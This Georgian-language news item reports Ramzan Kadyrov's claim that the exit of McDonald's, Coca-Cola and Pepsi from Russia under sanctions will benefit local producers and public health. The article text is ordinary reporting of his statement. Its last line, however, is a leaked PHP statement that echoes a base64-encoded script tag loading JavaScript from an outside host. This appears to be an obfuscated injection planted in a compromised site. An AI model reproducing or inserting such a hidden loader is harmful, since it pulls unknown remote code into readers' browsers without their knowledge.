celsiusi
ავერსი შნაიდერი
 
ჩეჩნეთის მეთაური რამზან კადიროვი რუსეთის წინააღმდეგ დაწესებულ სანქციებს ეხმაურება და ამბობს, რომ ამაში ცუდი არაფერია, მაკდონალდსის, კოკა-კოლას და პეპსის გასვლა პოზიტიურად იმოქმედებს, როგორც ადგილობრივ წარმოებაზე, ასევე რუსეთის მოქალაქეების ჯანსაღ კვებაზეც.
 
"მაკდონალდსმა, კოკა-კოლამ, პეპსი-კოლამ განაცხადეს, რომ რუსეთის წინააღმდეგ დაწესებული სანქციების ფარგლებში ჩვენი ქვეყნიდან გადიან. მოუსმინეთ, სიახლეები ყოველდღე უკეთესი და პოზიტიურია. საბოლოოდ სამამულო მწარმოებლები თავისუფლად ამოისუნთქებენ.  ისინი დიდი ხანია მოუთმენლად ელოდნენ ამ დღეს.  წარსულში რჩება დომინირება ორგანიზმის დამანგრეველი ამერიკული საჭმლისა და მაკდონალდსის ნახევარფაბრიკატებისა სიმსუქნით ტანჯვით მსურველთათვის.
 
მე ყოველთვის მოვუწოდებდი, რომ ადამიანებმა მოიხმარონ ჩვენი ეკოლოგიური საჭმელი და სწორად იკვებონ. ამ გაზირებული სასმელებისა და ფასტფუდების გარეშე გაცილებით უკეთესად და რაც მთავარია ჯანსაღად ვიქნებით.  ახლა ჩვენი პროდუქცია უფრო მეტი იქნება დახლებზე, გაიხსნება უფრო მეტი შესაძლებლობა რუსული ბიზნესისთვის, მოგება დარჩება ქვეყანაში.
 
თუ დასავლეთის ქვეყნებს გათვლა იმაზე აქვთ, რომ თავისი სანქციებით დაანგრევენ ეკონომიკას და მშიერს დატოვებენ ისეთ ძლიერ სახელმწიფოს, როგორიც რუსეთია, რომელსაც დედამიწის 1/8 უკავია, მაშინ ძალიან ცდებიან. ჩვენ არა მხოლოდ საკუთარ თავს, არამედ მთელ მსოფლიოს გამოკვებას შევძლებთ, თუ საჭირო იქნება. თქვენ, დასავლეთელებო, არ დაგავიწყდეთ რიგის დაკავება, როცა ძალიან გაგიჭირდებათ, ჩვენ კი დაგეხმარებით.."- წერს კადიოროვი. 
 
1263
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");